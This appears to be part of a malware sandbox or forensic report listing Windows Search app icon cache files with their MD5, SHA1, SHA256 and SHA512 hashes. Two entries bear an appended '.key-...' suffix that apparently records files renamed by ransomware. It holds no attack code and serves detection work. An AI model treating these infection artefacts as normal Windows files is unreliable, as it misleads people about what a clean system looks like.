SHA512 2a77656d9201c8684315c1fe8693fee206b13d072fd4164491b7a4c5fc46a3ba78216200c48b044bad221c27423394529173f8d84a5a38da7343231d0f7d9fbc

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc

MD5 7279e4431c96c1030f6ccefb5fce7cf3
SHA1 e6d0c93d63c00d14e2f40f5fdbf6c3fdc3487442
SHA256 64472af7e48d716d113b1c8a8241eaa67737b21e29abd62b4a0bfb485363ae3a
SHA512 db7febd66f65a486b1b77f13d8b32787c9d04e2b07003cd0dc90f4531afe70132ed9f165ab55c012b60857bd4e6f8fe2e78f7ff132bf64a95159d7138e5df53d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe

MD5 7689c30d53af0dc638a76cdac2b6755c
SHA1 ee74ae57c6c4867783c282b46cce4aaee6fcd5c3
SHA256 a05bcdcfa0fdc148fc7eadaa891e11d3646b84b04f793782b7257edd77015e35
SHA512 6840a48e5725501b37455f650cabffc17086453b6d70f943ff379f2b5b1ff9d1a72da8dd27083c082c3abcaaca3cbcb36da2c7005d08811cf94b45e88392f38b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe

MD5 4f0414c4ef966619b5cf9b740c9f1096
SHA1 d136f140bb9aa3d3d9b5aa5dcb413d78b93c71fe
SHA256 bfedb922c2dd20626051ac2dea4f06021eb0a51ed53d901bb7fdc3c27b0c9cc2
SHA512 bb094fd2695d2ad8f0e1f5ea5652dcf1e377adeb597cc84836aed75685689aa14f622632575bfb59a37ab86610f0595b3897adc6db7278dc141e4ef9495deb38

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe

MD5 5e8789e07e5c0545251da36bd0c8e4a5
SHA1 75a00b8758ec1b080c47dae3452977e4a61f0167
SHA256 5682a3ff1985edd22549e7821899c00286687562c768c262de1d2a542b1884ff
SHA512 3a415a469a0c2f833f93a64c5025388bc83513502cdaa46f0091d11006e48eb67215fac01953bb02c5f304d21e0f487db1085260f0f603c554c4b19434e137ce

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 8f1510c256b21f883351f534f2ea81eb
SHA1 fc82742237e8d9ccb6efc33de0270ab8e0999aaf
SHA256 3bdd3b8092d66364f92ec818f5cf443c49262bc58e8d4237a71cc8882d0871cf
SHA512 00b9a432ff19b52998e436fb5a5396b904e9cb45ebf303e25565ef816157981d1acd42040fd4efe7e7a78de1792dd1f396226c8954aae3af7bc539a346d6d702

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe

MD5 f29ba4c9e82e3ba6f79cb3383cb96f79
SHA1 f8082d87ac238c237627b132889c9cb223fbb262
SHA256 9e228359b717ec1507aaecfa380c6e8e24a810133f8e5bd11171e5f9cc905c84
SHA512 a33b9c6e094ba20e7085e42ced2de54bd74461575d581b859a36481ff8c65f7737d0ac52429bc9ead3ca67f197755c49f0ea0771d8606c7af8bab55d061f6f84

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe

MD5 f4ebff482100da28a335dd2ee22e4a32
SHA1 bbe5f2c752b40641d02cbb43d5c0fb9c53889414
SHA256 802308e769a49d907538c5fa0e974313fb6e3bf29cfc8c6d1d69dddd8cd124af
SHA512 86147c1a98cde8389145059666a7d241035f69558183d21f2d069a2f973de96125d5b3f3985732d47e556c09dd0d0acb75447293700e9b45feb798e145c5add1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe

MD5 33cf1a9ad7e502fd7c2de69a7da48801
SHA1 a71f1a144616eda1ca60886843fae98703417a0b
SHA256 f160948153cf32d47d35bea85eccd51929566e662c6eca6f838515b0860704c0
SHA512 edbee4a88c5e5f049ec86a4b8beadeac89f4eec81f1176ea35f2f689fb40f335ee1f85df856d02d224f5fb95e4ac1e9a85cf6d54b4c436a50e478859ec9fc517

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe

MD5 406347732c383e23c3b1af590a47bccd
SHA1 fae764f62a396f2503dd81eefd3c7f06a5fb8e5f
SHA256 e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e
SHA512 18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe

MD5 3ccc6610ecf9eb036fc50fda1f781d21
SHA1 de7db115b3bd1b926ae0b2a795e7d0feac621851
SHA256 2192613bbcf96dd824a813b59c598c486ea713a05c82fb1184eb955bc3b84839
SHA512 aa3a6d68415fc17695a8dc35271617834a84b3485af974cf34f2ff2a065ab6217db4a19e08abd22330dea9d9a44963e0aa70feda061db2ca6c0c29b2f4c6ca42

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc

MD5 92e39e4bd3e216cf76a2cf3d93c53fdb
SHA1 6b3315770d169c632712e5bfa002610c3917d99c
SHA256 be2529bc70fad82f5a753a3c4083d9ae5361c1e95a2c5fce51df6feb442de615
SHA512 ed9c3732a6f54efba8313ca533eaf6e9a5eac80977ac8028452fbfcb1429e46de192ab2afcf7f1d3bb1f0a1a8f31f00782424059d82022f660bc44fe133e3b6c

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe

MD5 9b55b8a492df2ce8fb6e9b0565dbcdcc
SHA1 b52570ebb2a3c3aa8cc3ffc6ad0955078abd5235
SHA256 e73573d120f91a45563e277015e3ca72f05ff1b18976df5c81bd490805020f25
SHA512 a8fb3c061f4b6fd17167cd8ed9f92b34b90e826b6dfc036db33c72f960052e20c4cc0fbef3988032ebc30449aa310149e81187bb7e6ff87f6249202f2652cc5e

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe

MD5 295e1773200faaaf90fde45e9756fadd
SHA1 8a2c49076f59739c7e69f19852d4ea0a772af2a3
SHA256 f795251afd7834282ad149d10bebf7dceea04ba56a960b7b9e3899e4287f1385
SHA512 f0cd5d2e0b82d40c7256b4560e461b3eefa73fe51ac6679f29928faab673276ba12190dcaa404b89664bdb38e4da04c968e1db694410c9fb68d5234b58278d14

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe

MD5 2bd136eb4cb4539c66599b66221dbbba
SHA1 22532c9b312cce5d6e593955b795cb2ba2857124
SHA256 aec7c44a6c41813e7a0df059f38d60c3a4fbe51683d3f9d17e8daf67c0a5c8e6
SHA512 22ef6a2565c30912f65e7b6f5e53981d514f3881e457dd7761bb4e7e286f22bba5e3ce6d0a2f7c02971d801a4e999e0d6ca4aa6b7bb935249cc947e2b3d2766a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel

MD5 744a0320026eb91c3f475b4ceb3a39a9
SHA1 65f61bf6a7e5094f68656494a59553c1c64123da
SHA256 b003c371a0dc78f40822f9959e084ad23cbb605dc362f04fff880459bde1b63e
SHA512 1e961b5c1d77c81ec0f326608a1e12511a4a0041a458b4551c17859b3afb83d98ca3c84cd8ff771684a6747f6df2ac82fe5851132034c1c42c8bd1029f4734ba

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop

MD5 c29ef40b14d06595314ab1f6634ee474
SHA1 faf7420e380424794dae3192186f4e5263d1ec1c
SHA256 4121ec51b50f6b8d459c56d92058af3ac611b00d7245d7b39145d47445e7273f
SHA512 60a472a5867d3fc79e5023ec260fd00dd48d207423b336a9c7393fd8a7303e88b2aecb005f652f2a983d522ec878011dbe797ff56bcf9079a43a4e971f8f4531

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_msotd_exe_15

MD5 f35b45b5028b3b64375cbb3fafb44044
SHA1 24ed8611db1e76ee699152e10be6c96c60e8a7fe
SHA256 848a25007192b687231de4053ef7ba80b6df0e70d52342b4b1fd4abb14ec4c25
SHA512 0d7ddae93245cea32af0bd89bfe9f841bf905b97464fb87aeb5158190e0a166b69a88babc7498b88eefd41838696db2c6245ea63a3d5c5d8b78e702972f765c5

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_msoev_exe_15

MD5 7b4b9fd2b81ce798f3b31e585fefbd06
SHA1 9b10727f132e741089047841df048fcadddcd9e0
SHA256 3eaa9bcb1be1f9fb075bb3b37a54646e72b506fcbe1a3614ad01a4d98d8689f7
SHA512 2e58940bdca873a6dd6056b6cde2b7d687498a12bc50649385f58727b43b7d7bf7bab7c530bf3c4e539b559c13c422172512a246e0edea392c021bc40b2a3d15

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_WINWORD_EXE_15

MD5 a03a0988894c00b0079df02367d9825b
SHA1 e7c6203741bc7b729f4ea6b7aa0afac1fcaec277
SHA256 6f37c8f98b70b89c2cc380d0aa38b0262921202d0ee63561f57a3304575236bd
SHA512 692a6dd4619f7e05c06480d7a65fbec407a31d30087ee89efe8eda8e8a578e7a285f51af58ddd9e2c1629b9b9b32c57c8031457587b3c9a7088e21b03ece1b35

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SPREADSHEETCOMPARE_EXE_15.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 a3bdad157c3c9c755b20d92c7f90021b
SHA1 e4ce34a1f445369a490f14e545df7156af088f8d
SHA256 2660e3eb37b749153133738dc32757b44b020951428b6efbb9be0cb515210b4d
SHA512 55e89b1539f3e8b7ac209aa1083840c2a1e38f228ed160cf2556e3be0e0791e3ec757db4c42415020c8f3c90585917d920b057dfcfab213e6e89bc218e4042c2

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SPREADSHEETCOMPARE_EXE_15

MD5 d73810507446e10f35cef691a91cc5f3
SHA1 f871fc76285b469eaf3f77697acb489438671a31
SHA256 bb2ac675156df74f88f154e0b586c759ad50b5c57dcd8a98005d5597ed7ad1a3
SHA512 c9d458e899fcec6eb5ce5eae2371ab7f20e741b6cd3e82b052041e33fd8bc5c77fdcb4ee239bfd07913074eb810082a0c9753c25571aeb8aa6cf04f072e1f764

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_POWERPNT_EXE_15

MD5 c314b7443a535d4b39b28c6a2d246ef5
SHA1 b7688df267a8304d3f1f6afdbcddbf96a5e86fcd
SHA256 288834f082fb5ca0868a7b8fd3f645c883841d612731771df1c9490d99af76ad
SHA512 ca3ac5def4b819cbc0cb770a2e0b482e3ad5753f167b2741e7e31c20ab7236559695297b9dd5d8088ac2f1b3886a7e644166c4fab29dd63c60a906abc547f422

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_MSOUC_EXE_15

MD5 943dc823b68d13170c037022cf94d95c
SHA1 0e39464d007f8c35667277d3fa42f297a5d75820
SHA256 ee75215cb2025b29a28bd6ba4d363924ea305eceee5cb9c9afe68dd97c7b0415
SHA512 4ae351553521d41e844f6de549f1c7a6dd3eb544b50976913cdea58edd3e3b8cb81d21b2461258c3af1c65815ccdad407ae193d220656a44c6f4d4f21200eaa1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_DATABASECOMPARE_EXE_15

MD5 1d3c4e80c24cd236fa76a27435926362
SHA1 7dbb5cdcac2ba68296501209c9fe98edcca2d35f
SHA256 dbcdcb3b5da2fff40a182288466d41e376b9c578ffcae1c40e53e6b2b1162b2e
SHA512 b871c72d59f3422ef443502bdd0c955be46f34f599efb063dd5d8701902c390f8397df4d4d04699a03cc3326f4761a4d463df7ee8f7a32559ae0b0e39af41acf

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133758891502102316.txt

MD5 190a3a38fbbecff68c090688e6c8ba20
SHA1 9afb677325a0456575b4fc3327daaca9ca392d32
SHA256 cf0665cb7354dbf9b6ac678bfd496e4de678aad8e90c34549c2a6c9b5e63ef5b
SHA512 5957ff1e49cf3b12474dd457e1e0a953eec5fa6e3f28989ce6338ab724684e7b1fd0423adbed1ae2f15ab18fc9918a15f81657cf1a41bd7dc02435b2e479ecb7